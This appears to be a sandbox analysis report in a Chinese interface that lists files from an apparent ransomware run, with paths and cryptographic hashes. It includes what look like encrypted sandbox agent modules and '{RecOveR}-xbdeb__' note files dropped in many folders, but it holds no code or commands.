搜索相关分析
exceptions.py
文件名
相关文件
exceptions.py
C:\gvszdsz\lib\common\exceptions.py
文件大小
624 bytes
文件类型
data
MD5
99edc4a2e268e3472a1416e94efe41fd
SHA1
9caaed317499f323ffb25b2993d546f340fcc6e1
SHA256
12df1a3601d0c1c523ab6805c0b76db2616c5a24cbff800f51fa502c4214758c
SHA512
650b413f584094629069474efa2094b903726348930573ab4e37566272317a1a8024efb165f0e47b8874417768578693a3c1fc
109acf7341d1a995cf319adb49
Ssdeep
12:GwU0vWA5etxozmwJjDpMnFUx5WQXXjHJ1yhNF+2C:Gwf+ueTZ42FUOQXXjpQhNF+X
Yara
无匹配
VirusTotal
搜索相关分析
storage_data
文件名
相关文件
storage_data
C:\Users\test\Documents\storage_data
文件大小
264 bytes
文件类型
data
MD5
3d6a578618bddcd4b78b47cf9367e96c
SHA1
eaee5c8e036b523aafb0a9f66d61c559236eaa0d
SHA256
a82e6ac7730e79e4221e31248ff353a066a9e86ed11e4b2bcffbe57923ace717
SHA512
afc190aea3fcbbcc51070505cc00f7ab0bddbb651a0ffb7ce6e02593942dcf60933c6c7190f9e38881f3d3b97fbb1e871afc464d8f
f1e20f29dc4d629ffc8bb0
Ssdeep
6:yDuyIGvcjllbjfunXkvrnkVfIyA5KweB6wdgrO1aXjO/:m7IGvcj/bU0vWA5et4C
Yara
无匹配
VirusTotal
搜索相关分析
results.py
文件名
相关文件
results.py
C:\gvszdsz\lib\common\results.py
文件大小
3552 bytes
文件类型
data
MD5
a64e6036674e539f9b1a330731aee76d
SHA1
e60e9133bcd3e76951091460e95846ac969e1f8d
SHA256
abb2c72a7e218ad68efcdcf9f2b15fe357d5c893778b9bebb58ee7317be7b54e
SHA512
38eb21640235732b9d5baf89357edee5c7631470e467b894385bf44917bbba93c19de6154d19c5b03bf8f3bc5527b3ea4f1d2a6
611f3c345a22c0b605fc51382
Ssdeep
48:GTvTS9TTaoOIx9f+IYxUEN1I3jWSjk1ipFvqu/0VuvECFfU3FMT5coI9daV9sP:GTotHGtlsz1dnvqu/0LY8ObIvP
Yara
无匹配
VirusTotal
搜索相关分析
cpl.py
文件名
相关文件
cpl.py
C:\gvszdsz\modules\packages\cpl.py
文件大小
864 bytes
文件类型
data
MD5
fe62305b7e7c9489b5e9274459ab9b2b
SHA1
e192191281d4770dcbb99bb6d359e211a2a7041c
SHA256
3227d17311ac2cd845ab8975238ba3d9f4205a9c11af2b9ece2047195d675d14
SHA512
4e7465898cd95f62a03c9741828f26279e36aee89aeb188f530e5a1f679feef26d4ad5aaa6522a58d22baa9c39f0bd349742902
1994cbe6965f8ae2b33cead58
Ssdeep
12:GwU0vWA5etxozmwJjDpMntx5WQXXjH25DRylz+OtmeravL80P0jmJQ:Gwf+ueTZ42tOQXXjW5uzjmeuDPPami
Yara
无匹配
VirusTotal
搜索相关分析
regsvr.py
文件名
相关文件
regsvr.py
C:\gvszdsz\modules\packages\regsvr.py
文件大小
1408 bytes
文件类型
data
MD5
902cc42309b481e13017e0e5f7359ad4
SHA1
991822e716a8d297caf9c33098a15ae4c723f001
SHA256
5f3c1dd2c6a42a99f3d2e4e10aabd39b16e123baa4d5116e758f53e342145c97
SHA512
5a8f2bc56606a248e44205c6f57a2d77eb31bd0f180e7f6376275b6287f15c76d811f9934d105c8468491eb6faab6c692c6383b9
ac8201b0df2d6ffcec68c78f
Ssdeep
24:Gwf+ueTZ42AOQXXjrsM6aheAeAur7WgTN2W90SIagiygWi:GTvTSNTT5DAPr77TN2LtagiygWi
Yara
无匹配
VirusTotal
搜索相关分析
ps1.py
文件名
相关文件
ps1.py
C:\gvszdsz\modules\packages\ps1.py
文件大小
1008 bytes
文件类型
data
MD5
4279e4df702c8489945fc87f8f66f032
SHA1
815492bcade886a24c39715ce733018215a28a1e
SHA256
4e96234e47e23217103126036cb5171148d12f8450d66a179bb9c1e5337d5c52
SHA512
67ff4d87bfb75c8bf0783967dcc173957460b85aa52e6d0e69a52ffbce815ec172aec9d0241c886a5483eab9bfa72dd4b8b9a8e4
3e8b09943eff7fd70222b2fc
Ssdeep
24:Gwf+ueTZ42rQOQXXjW5eYvPiSjXXOAaS0uUn:GTvTS9TTKeYn5nOAaSPU
Yara
无匹配
VirusTotal
搜索相关分析
exe.py
文件名
相关文件
文件大小
exe.py
C:\gvszdsz\modules\packages\exe.py
1776 bytes
文件类型
data
MD5
5d3fb1eb9022e93e47b81002b8389b1b
SHA1
93b60e1993131914bdc2c6a6a29274948a23eab7
SHA256
e05676184c18306ca3cc8f23082d9b7d997918d808d084befedbad62cd6b1991
SHA512
df571f8d1ac7b7468d951f14e5a3ef1a49f9f1ba887798396f5ff4329ea9e5a214874c53b8f4c315eff5af0bb8ae64d75b575fde90
6923ff5cd4692e3986c476
Ssdeep
48:GTvTSMZ+NaKTyQdFFHUeAt4TTCej+cn8Uh6QuTp:GTYlyXqTTCeac8UhoTp
Yara
无匹配
VirusTotal
搜索相关分析
errors.py
文件名
相关文件
errors.py
C:\gvszdsz\lib\common\errors.py
文件大小
29888 bytes
文件类型
data
MD5
94026ce4b49b4f496025176aa176f880
SHA1
212e53b63995028551515948b8443a93ecd3a68b
SHA256
7d7b92fa7dfcae3c2eee0c30fbcd809b827558d5f327b93939f04baf586ea80e
SHA512
5bce46ba630c2a15e8d81d058365414fa969f09a5e92c70e3c7902288291423b4efa469a9c586a15e31aefbf59250087736157f
da7ae6662347ec27946004320
Ssdeep
768:tYf3mUz3DGIoXq1KDux9b+Cnp+oC/tIGAzRYImJS:y9tO8nbfpWtyRYImJS
Yara
无匹配
VirusTotal
搜索相关分析
defines.py
文件名
相关文件
defines.py
C:\gvszdsz\lib\common\defines.py
文件大小
6176 bytes
文件类型
data
MD5
88f9d1d748e2582afe84e06e347d45d9
SHA1
8c362c286fa9ba75d5ec074dd747a710abc0a171
SHA256
fd9b4ee5bc306263838d8c79e45b29ca59fb4ace188ee51647602eafb80ac6dd
SHA512
36c532cce8b46edbd4ed89165a2388ff701782d8998b2f76451c652bd46e09a86f6385323a99a567a2f36a0cef2d58e448a17f7b
2059880d3edb0652b5369d51
Ssdeep
96:GTaWulZqf28ov3RtRki/ar6wAUxffAJM7ceCSe1ky3n6oCudqcMKzz7nOy:aeqOlZtJ/2HAUxzgl7lXnCxVKzyy
Yara
无匹配
VirusTotal
搜索相关分析
bin.py
文件名
相关文件
bin.py
C:\gvszdsz\modules\packages\bin.py
文件大小
768 bytes
文件类型
data
MD5
92fff7bdeba3c08456e290363ec2a9ca
SHA1
9318534c46250c1d84f0a65c4601b93f84c369b9
SHA256
b03c02a664faaf0fedbb463e536ca3da9d48d5acfb879c7e2431f062a5a61a11
SHA512
ab57ba5caba47e6c896851cd3160a2867f5f6c2d4d2cee121417b4d62ca9f298a230ad0813f02cec4f73906209a12779645aec5
6d0bbfc2d5c47cd7b5e54c3ea
Ssdeep
12:GwU0vWA5etxozmwJjDpMnRax5WQXXjH25DRy4Rz3+mF3W7mYvnxp/:Gwf+ueTZ42RaOQXXjW5zR+mFGVxR
Yara
无匹配
VirusTotal
搜索相关分析
abstracts.py
文件名
相关文件
abstracts.py
C:\gvszdsz\lib\common\abstracts.py
文件大小
5424 bytes
文件类型
data
MD5
7bc7e55ac98635bbb3cc2027ee58d233
SHA1
f58c3330c973bd7f50a38916a0842e2cb0f0ad02
SHA256
e6b1c22108f6e6f7e8d6bb39dbf848ad928559b574b954715290fc397e6a46f3
SHA512
a2def658ef05d1911c8b023c7dc9b187e8a03e5e5b5a676d478b035661c21e13d1ab25b3eff8255a414923114bc38b25a79a26
7dc0f2d8274307977b254bd8e8
Ssdeep
96:GTe1/B57kRhn3Z9XQ4IlOiwjy9XMhg7T1edUMtN05armggDZ:l/B57033Q2hjySyBeC3aqgkZ
Yara
无匹配
VirusTotal
搜索相关分析
msg.py
文件名
相关文件
msg.py
C:\gvszdsz\modules\packages\msg.py
文件大小
992 bytes
文件类型
data
MD5
a554e9fe7311adf2473ddca3040981e1
SHA1
414c31feb6e7ba130ac1ae5367e9c43ef35db262
SHA256
03b66e35562daf2529ab58860710ab1a11061c5ef4a72bfdda478cf36d425041
SHA512
fb1ad9194e182b4060860d7922e0ae7a1b841c575787569ba74069c9531d2520b387320cfac6df435255fa4d15e42a73db5e75
16716270d35eb68968a5da3935
Ssdeep
24:Gwf+ueTZ42p5WS2MAplJlaxO45PNQXPlOYA:GTvTSw5WSUZeX5Skl
Yara
无匹配
VirusTotal
搜索相关分析
python.py
文件名
相关文件
python.py
C:\gvszdsz\modules\packages\python.py
文件大小
912 bytes
文件类型
data
MD5
24f0187e5b61116b425af8b46d8a711f
SHA1
4f699c85101d15ae0335fb1515cec8043ac02429
SHA256
be503fa895f07067c3f7e19818a6522034dccd35b7afd718cedeea61f8a9cdb9
SHA512
5c252e82720caceff8e49e767ae80f640d7db761b867d208065476f1e0ddbccd263d257599789d85173d4fb9637d8f01b37e73e
e3bc1b1008b0318bcd1067d89
Ssdeep
24:Gwf+ueTZ42vOQXXjW5DAIqn8z2bnglcPeL:GTvTSGTTKk8yGcA
Yara
无匹配
VirusTotal
搜索相关分析
process.py
文件名
相关文件
process.py
C:\gvszdsz\lib\api\process.py
文件大小
27600 bytes
文件类型
data
MD5
889fd98185ca7de4003f64106b88674c
SHA1
8531cb53c2ce9a5712d7c39d194d19eb863bfabe
SHA256
c95a2d52ce3674d761dcb9bd523b950958be8481501a5bd6e4f144a69a123227
SHA512
95c21a4ada2ff3e0caae4f9c35594f5f627fa7b12a1fcf99a9abd73f560b64357c16b95b38b33c2f33ed1ffd0293fb4ff1275751494
e5f4d696150f85339eebf
Ssdeep
768:yQoSBuHMB354M8nLtmdjHwyD7KYEyVHwFtrZC:uH2qPh0jHJ/EMwFtrQ
Yara
无匹配
VirusTotal
搜索相关分析
packages.py
文件名
相关文件
packages.py
C:\gvszdsz\lib\core\packages.py
文件大小
2816 bytes
文件类型
data
MD5
bde3969fa85681db18cc176ebdfa38e0
SHA1
2d7f0d25ec343d5d424642273371a22289f6b163
SHA256
656204d641d1298c416ca8238fbb4f91a125e3bbe0f99ffbfc7a9a1b5a271d85
SHA512
8e0c3851923aab1a80d522dd90e7990745098dccbb11ea06b0da8c240d58ae0b76298b4d39bcef5a040e0e94ae4c4f72c03d8a
31659a46f4139f18da148e63b3
Ssdeep
48:GTvTSdTTO9g7xbZjJt+6sm9ysUFLvIN18qxlQeOpYxhcZJzsT:GTYa9AxbZjj3sdU1llQBpocna
Yara
无匹配
VirusTotal
搜索相关分析
rand.py
文件名
相关文件
rand.py
C:\gvszdsz\lib\common\rand.py
文件大小
752 bytes
文件类型
data
MD5
7eec0c1bfca8ea7fde299cb17e7c36e6
SHA1
ff21c3cb4c92eee31f65a8ff92143c71eb41c342
SHA256
f301a15f60c9cfb80db9dd709860de3ac6c04689c33a27e25ad625c36394fce3
SHA512
4a12a5493a025eebfeeb32c69ccb284ecd45131e84a4929ed257112e8b6cf0e19e33fdbc441183c73ba9a9b1b1fb0f1607c6d6b
053d3ba1dbc317a76095cbd59
Ssdeep
12:GwU0vWA5etxozmwJjDpMnjZ0FRw7Yx3yNw/OlKA/fGWQQYMzAlI:Gwf+ueTZ42QRj1/OlKAXSJO
Yara
无匹配
VirusTotal
搜索相关分析
applet.py
文件名
相关文件
applet.py
C:\gvszdsz\modules\packages\applet.py
文件大小
1488 bytes
文件类型
data
MD5
7c97496f000a3596b1495eb5bfea8576
SHA1
3efe9c5954585d4a65d9d866470802cec408d73e
SHA256
73800c534a89ea6e79dfeab3b269263173087a354e4e467474fd5c7935c3edfd
SHA512
607e54f261f76d4c9e30de7737075f5a07f0e7f5061b368a3424ea2d728503cbe6920fb6002e8508380b29e70a3b56c085f33ab
725ad019a63ffa101b93fa64c
Ssdeep
24:Gwf+ueTZ42hOQXXjr9q0UCMn65DLVASXWD3RX3shWglnBpO2xuz/e:GTvTScTTRh5DLVS3RX3shWYnXOr/e
Yara
无匹配
VirusTotal
搜索相关分析
zip.py
文件名
相关文件
zip.py
C:\gvszdsz\modules\packages\zip.py
文件大小
4976 bytes
文件类型
data
MD5
758e70484a87ef3cdb12cc8f7b0b8515
SHA1
2768bb41510f3f5a0f21c837db1b679b10771f53
SHA256
cb454b2dfd24eea26f38986218fd2c8ccbc13fd92eb75720ed1885abbcae913b
SHA512
54056ec33bb4dad7515093a02853d49cb2f14a225eca84431168245550276b203498d63f9fef4f8c921f784b59effe8f27ff81d44f
33b264712df7fd457b1747
Ssdeep
96:GTjI06wHGzPAX5/6xNG1Btmwo7OubD0dN2vBkl9v5LaW3dpuo02shmDy:JwmE4NG1bC7OuUdNcB098W3dpuo0xKy
Yara
无匹配
VirusTotal
搜索相关分析
disguise.py
文件名
相关文件
disguise.py
C:\gvszdsz\modules\auxiliary\disguise.py
文件大小
1504 bytes
文件类型
data
MD5
0339d8e6b5f1f7822847a3674c65fe16
SHA1
82c72f63ea39ebcf23d1235aa8f1052dfa853497
SHA256
d1029b5d39eac1fb7e01cbbdb24754aa9213306ede819ad047adcaceb32288d2
SHA512
670ffb4f7e0f037bebace8f954886619df9d4449eed60a028f695b27cf155344d3568236f42457764604011ef20b61248a4203e88
967c40c261275c752fc03f2
Ssdeep
24:Gwf+ueTZ429OQXXjrjEkueURmzMldH71ZBQmXA2R5aQ0QdBd5jzzwzrIup4sMmo7:GTvTSQTTskL2dbfB7XA2R5aUd5jfKIu8
Yara
无匹配
VirusTotal
搜索相关分析
swf.py
文件名
相关文件
swf.py
C:\gvszdsz\modules\packages\swf.py
文件大小
1088 bytes
文件类型
data
MD5
6a1224607d94208a9ed11a1834b28601
SHA1
0ab16b33b2f417d41c5fff431f1d7a3c5716926d
SHA256
fec98903dcf9fec57a1845f8c138f32080dceb7bd2d8d3bb1e7461f63d80beac
SHA512
360334c84cf71b8cc77a4db55cc2556404dd8e4c76594b13ff0ec0d65359948044c5cb38175d658e8c3c271ab852e8efeabed13
35345bd6d50567bbaf8e94e88
Ssdeep
12:GwU0vWA5etxozmwJjDpMn5Qx5WQXXjH25DRy19T9S9Db8WkAbWfJyMPFTwSkqXM4:Gwf+ueTZ42iOQXXjW58o9P6JPFTmuv
gC
Yara
无匹配
VirusTotal
搜索相关分析
eml.py
文件名
相关文件
eml.py
C:\gvszdsz\modules\packages\eml.py
文件大小
992 bytes
文件类型
data
MD5
6f7e2f19d5dc52582aa968f97df0db08
SHA1
d5fb3c265b5943210cb9f2f502e6e60a3182ec73
SHA256
7cfb78f3d8e91aa7d1bc5d543e4ef47b5ce5f4d5787d17d6a311e86ce113f5f1
SHA512
6c2d08c74853b71a946c4576aa044e6aeb9db72576d81482dd0d6e1ce1159a886001dbe057987494fe4d4a0914f84f793a681d
74d56d79227b8cc3a5e280ca1b
Ssdeep
24:Gwf+ueTZ42YW5WS2MApl6eehcFxduC0HLhio:GTvTS65WSU4h044o
Yara
无匹配
VirusTotal
搜索相关分析
{RecOveR}-xbdeb__.Txt
文件名
相关文件
{RecOveR}-xbdeb__.Txt
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Txt
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Txt
C:\agent\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Txt
C:\Documents and Settings\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0018-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
文件大小
2881 bytes
文件类型
ASCII text, with CRLF, LF line terminators
MD5
2b01331771ca42f56b3cf40abfcb4380
SHA1
c6b71fb0f9e00477abc7fa7e1bf3fa67d3e0b20b
SHA256
c279ee4d388bcc6eb6a1fe3b5fccb6809444f39153eb9f75d8b698e586c9b4d7
SHA512
df7e9e38716c940eca98b5d4772bf65b5bf65443f8a76acb5eeb55cf6d40edaea80edb7485b5904508af3615c49023a81def5d45
c82df48913e41f750e8e1931
Ssdeep
48:eTUmYqlpcykXDIHyjArgnsH4ge7XDgNhSfMHEFlXiHNlRudlXe:XqlLKMSjArgnsyDMNhS5FlXitlRudlXe
Yara
无匹配
VirusTotal
搜索相关分析
ie.py
文件名
相关文件
ie.py
C:\gvszdsz\modules\packages\ie.py
文件大小
928 bytes
文件类型
data
MD5
b48a28c14f260e857bc1bd5c80b0c55a
SHA1
b85849a1c06c4367cf15783462c37089ed787282
SHA256
3ed41aa761717525f404b58b8e768c9309a345d0a2dcc4f0ce6ba194fa03242d
SHA512
b5f0bb08b554f0129389dd888167989ebf76e0a57298f8a330be1f2191a916e1ed8ec576c6ab89fb6be995fe244fc1aa1477f5b0
54b7efb264751255b7c0fc71
Ssdeep
24:Gwf+ueTZ42rOQXXjW56/MV610a+STFv1zr8qvm:GTvTS6TTKGU61J9v1vQ
Yara
无匹配
VirusTotal
搜索相关分析
human.py
文件名
相关文件
human.py
C:\gvszdsz\modules\auxiliary\human.py
文件大小
8944 bytes
文件类型
data
MD5
b45d7569c0698dd3349e1255d26a5075
SHA1
1d35a6ccdb5174c69b4dac3525448c5dc049e20c
SHA256
126f5757e10087a06d3b3648628101f4b239a0fcfadd02a72ca4321576649150
SHA512
b9d6fe4b20e707e7a3f352a4f6f3ad78a14ae0592cb862c0d92a7f77c00192405ccee7153b92d5b01286a69288f3d43f6754ceef
ad85871cb1b5da89659946f0
Ssdeep
192:U90/oT7h5qM3h+k+ugdZ7vsZYTt+eiaMdj6c+rRo5ho:05NdK0Zat+eiak6c+1gu
Yara
无匹配
VirusTotal
搜索相关分析
{RecOveR}-xbdeb__.Png
文件名
相关文件
{RecOveR}-xbdeb__.Png
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Png
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Png
C:\agent\{RecOveR}-xbdeb__.Png
C:\Documents and Settings\{RecOveR}-xbdeb__.Png
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Png
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Png
C:\gvszdsz\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0018-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
文件大小
88929 bytes
文件类型
PNG image data, 1250 x 1250, 8-bit/color RGB, non-interlaced
MD5
5f6189a798a5c81ebe5028eb0e16f057
SHA1
1d29320b247c4fb1c9631adc356446a31f0bc0ce
SHA256
1000772e3c90ac88a28ef50ac3adc90d1683225b7e0845fd7cf6c2633271f198
SHA512
590ac121e2254ba68e1724f10e3e72a729fb84529d54c7f5bc520e15b7c3b58f238ef84dd35a25fcdae5c52a6ede27b9e80aa04
bd4e2b57a90931044f3620ae4
Ssdeep
1536:1+NltG8VmN8bMF2xrnTo6NeYL+uXXeOcI8VN:4N6mmK62N3NeY6uXuOcIa
Yara
无匹配
VirusTotal
搜索相关分析
__init__.py
文件名
相关文件
__init__.py
C:\gvszdsz\lib\api\__init__.py
C:\gvszdsz\lib\common\__init__.py
C:\gvszdsz\lib\core\__init__.py
C:\gvszdsz\lib\__init__.py
C:\gvszdsz\modules\auxiliary\__init__.py
C:\gvszdsz\modules\packages\__init__.py
C:\gvszdsz\modules\__init__.py
文件大小
544 bytes
文件类型
data
MD5
60fcaa39b303ddc0c8f17879183f1d9b
SHA1
dd7e64748947f8312305818df4d2288283c1d939
SHA256
4ae9e50e5674bcfacfa3549dae49a4ef86ddae1739a05971ff82b064a5feabfc
SHA512
0342ca6414cb247aca215e12118988bce4538410c4b8f93c92c365ab3216f402eb175c08168129dd0d2bfdf3f94ea8af7564dd0f
b40c3e24a31e8d3820f3b918
Ssdeep
12:GwU0vWA5etxozmwJjDpMnKaUx5WQXXjHnt:Gwf+ueTZ42UOQXXjHt
Yara
无匹配
VirusTotal
搜索相关分析
privileges.py
文件名
相关文件
privileges.py
C:\gvszdsz\lib\core\privileges.py
文件大小
2864 bytes
文件类型
data
MD5
412374c1b54ce911cad26a286bf8967c
SHA1
e080d28c5458329b59e89f746ec5d85f6fa8986f
SHA256
17b432d1dfe766d07040a54c9fbd004f40d48effc1c19a0ede85a0dec026c033
SHA512
377f396c3fdbec50474695988aa117132ac544c235f7f044141ac566fa49756882e925aadddff2af22d4960baa8efe34a7fbe7296
d171332fd9b5325b0a97089
Ssdeep
48:GTvTSlTTmOLj5fkeda/MqgprvTN7yVz2wPCpwqQfLvCzBVeQaYK91fwaHBrzXFCF:GTwpjldyviT8V0UfOeQaF914ah31COA
Yara
无匹配
VirusTotal
搜索相关分析
{RecOveR}-xbdeb__.Htm
文件名
相关文件
{RecOveR}-xbdeb__.Htm
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Htm
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Htm
C:\agent\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Htm
C:\Documents and Settings\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
文件大小
10767 bytes
文件类型
HTML document, ASCII text, with very long lines
MD5
e5055d8a7a9260c8467db01ecb17b897
SHA1
5e5f7d0aa46093cf90542a2a16df72053c05b7e9
SHA256
a3abfdc19d1e66aea19b735fa72c98b2257c86da40043d3be92c4937ab99f24f
SHA512
c0e3b58c5b9a6aa1b91b7683deb22583c8a61ca7646b089a0af36b0604478dbba1d73cbf6c62493d39aa7d6b812662da3a518
00931e4e0166b7b369a9f52462f
Ssdeep
192:LOf0pYZG5g4fj0CByfCsWNcNKAekvMBGz:xt9QCByfCsWNcHvMBu
Yara
无匹配
VirusTotal
搜索相关分析
doc.py
文件名
相关文件
doc.py
C:\gvszdsz\modules\packages\doc.py
文件大小
1008 bytes
文件类型
data
MD5
37d30f1d0e49d8fa6c5e2813cafe912b
SHA1
1a76cd4f2df019c0fd33a9fec68160f48a2ef521
SHA256
3a183123a0bf1ffa8e9436fc562a41b1689ef9ac19bb005100bcec9cfc66ea1d
SHA512
a23fa630151f005dbb660492bf1ec0a97ac3e4db6dfd4e4e777fffb45a68b4557dc650828d692d59fd6b98f769908cf339c1a398e
8bd6cfd3f7016c66b9f6ca3
Ssdeep
24:Gwf+ueTZ42EOQXXjW5ZKR5/814Kik13juC0O:GTvTSVTTKW/814mjuC0O
Yara
无匹配
VirusTotal
搜索相关分析
html.py
文件名
相关文件
html.py
C:\gvszdsz\modules\packages\html.py
文件大小
1552 bytes
文件类型
data
MD5
6bef83841017957dd8db8e3734826c4e
SHA1
cfb44d39b020eba0739af846c9a40b663bf2aed9
SHA256
808d3d2a11e8d0fa60fb880d53a73d071b6519f367300e6a0e17aa50ac559b8e
SHA512
18362fc663b3c5187cf53386459b44ee081dfbb43a3d89d39c43cf867c5f81cccfe3bfc06a75b814fb4d07c7e5c129a737488619f
74f6786e842899b014f7c54
Ssdeep
48:GTvTSfTTbvFpgYayPdcTHT9Jsa81vPE7hz0IH:GTSHvPzBdc7xystz0IH
Yara
无匹配
VirusTotal
搜索相关分析
dll.py
文件名
相关文件
dll.py
C:\gvszdsz\modules\packages\dll.py
文件大小
1712 bytes
文件类型
data
MD5
34e9ad5d3fe59c438dc8208d54c9942d
SHA1
5c010e90c40c7d80376f4ed289870bd8ac44677f
SHA256
68ff26931ec7ea4b86c35e31ca8e26d951e4a01c70cdd45ade3d7c7f9ef1f641
SHA512
ac09af6a70ee9e773ac9bef1c0e81566ffa8da4fda5c1fa5759967779ca0f2742cde8f8d6d9279251ad5c5411170e81de45951c5
0ffa612090af9b96702bc4c7
Ssdeep
48:GTvTSOTT5D3Dwcb8Tg4x5+UOT3X6QGbhR:GTptDzwqN43+tgH
Yara
无匹配
VirusTotal
搜索相关分析
agent.py
文件名
agent.py
相关文件
C:\agent\agent.py
文件大小
6544 bytes
文件类型
data
MD5
42bfec8436e1ff0e8e63a5ca7a2652de
SHA1
66c4385fa0247f78235afca1afea8ba13dd578ad
SHA256
1c2b5987f1e8bee452e608cca25b23dbe129cd4cb06b67ee3d0eb275f5ad560a
SHA512
7c25245d56ec1e8cda4ec44b205a122c3bddd1491cf7c3740d429cf9177031f02c3834256e91a55632584cb2ff6e1dd2175eb2d
3fe497dd0b46e5f80d1eda7d4
Ssdeep
96:GT7N5OW+yO/0ut99ZjFD4HkxDw9ycnNKnwgu0zasOAFFk2ReFXyurWZ:k5OGAjFD4yc9ycnYn40Bk2AXdqZ
Yara
无匹配
VirusTotal
搜索相关分析
firefox.py
文件名
相关文件
firefox.py
C:\gvszdsz\modules\packages\firefox.py
文件大小
928 bytes
文件类型
data
MD5
975689b2dd961ed6549498e22ffbb868
SHA1
db92da6cc5be9f53441bbc784933a17a310aba67
SHA256
53fa1d7b9154795a46a07e74d8e912cb0322eef877c318944996c982b23aeafc
SHA512
585a16329e9bccdfa900af82cc91031f2abcd7d4d4bd90c57f0789a9734220628f5e2018aeb7ce40a9e34ccfcde0a03198a1bcbe
23dea752bedb1093f8c53cc5
Ssdeep
24:Gwf+ueTZ42mTXkiUFeNsnFzqtfRBiL4S+U+:GTvTSNkikeWWZM4U+
Yara
无匹配
VirusTotal
搜索相关分析
utils.py
文件名
相关文件
utils.py
C:\gvszdsz\lib\api\utils.py
文件大小
2352 bytes
文件类型
data
MD5
d8b9c014598f1954fa71d614641d3f39
SHA1
94e8cf423e178846508e8c0db723c90588d8b829
SHA256
5f339f87b25b55ac7f1fda3232220d2b124dc192a5e6935a202d334c07c3c5ba
SHA512
ecaa6d89aa368e96fcc98a8cb7c8516564292d89a290e23e5670fb88e87fc663724bd3ec032a643d62ea2991f193160a8102b8
3cc695eb7b8d464520955b482d
Ssdeep
48:GTvTS6SldmUuxfSairFQao8rClfrQeYi5TrmVGSm8xn:GTedVutSairyMCqeYi5TCMy
Yara
无匹配
VirusTotal
搜索相关分析
screenshot.py
文件名
相关文件
screenshot.py
C:\gvszdsz\lib\api\screenshot.py
文件大小
2944 bytes
文件类型
data
MD5
7a132317a86bfb02a0a62aed0412fa84
SHA1
efba14672d20b9808c5d1baf37b03045d18cf281
SHA256
1b3399141ac05902c88c3ad5e65f1b7320788a04ce012a30dec406a2d47a20bd
SHA512
6b1b434e66fa52f2c9d28bf2bc35d90c36d37490e983101f7d51b3fe512feb526b751ba734c4c8ffb1d6f70c4f855345bfd5309d3c
d9c3fa5ffb2373b49fe401
Ssdeep
48:GTvTS6TTRxMdZFZraqJR8Pr2IoWrTRUpsBTxiGGVmumIyXQ1WI5N5zFn:GTZlxEPeTD6sTMGAmdAH5NJFn
Yara
无匹配
VirusTotal
搜索相关分析
constants.py
文件名
相关文件
constants.py
C:\gvszdsz\lib\common\constants.py
文件大小
1328 bytes
文件类型
data
MD5
d810f83f3576c5b5ce2fab1b810a11e6
SHA1
147cda0f8e4ee28eb130b1d78db1dfa389b78b42
SHA256
c7af86667797c583599dc5d6dfdf6c6eb1f1ef9a5692a109192901f1e321dd37
SHA512
1571e6a4a82e9e6e2fc2bc2c314dff6f6e4e48e8aada0d963b291ac990465740c3fb26ddf4ca3ff1d88af064a35f9c2e8061fd7115
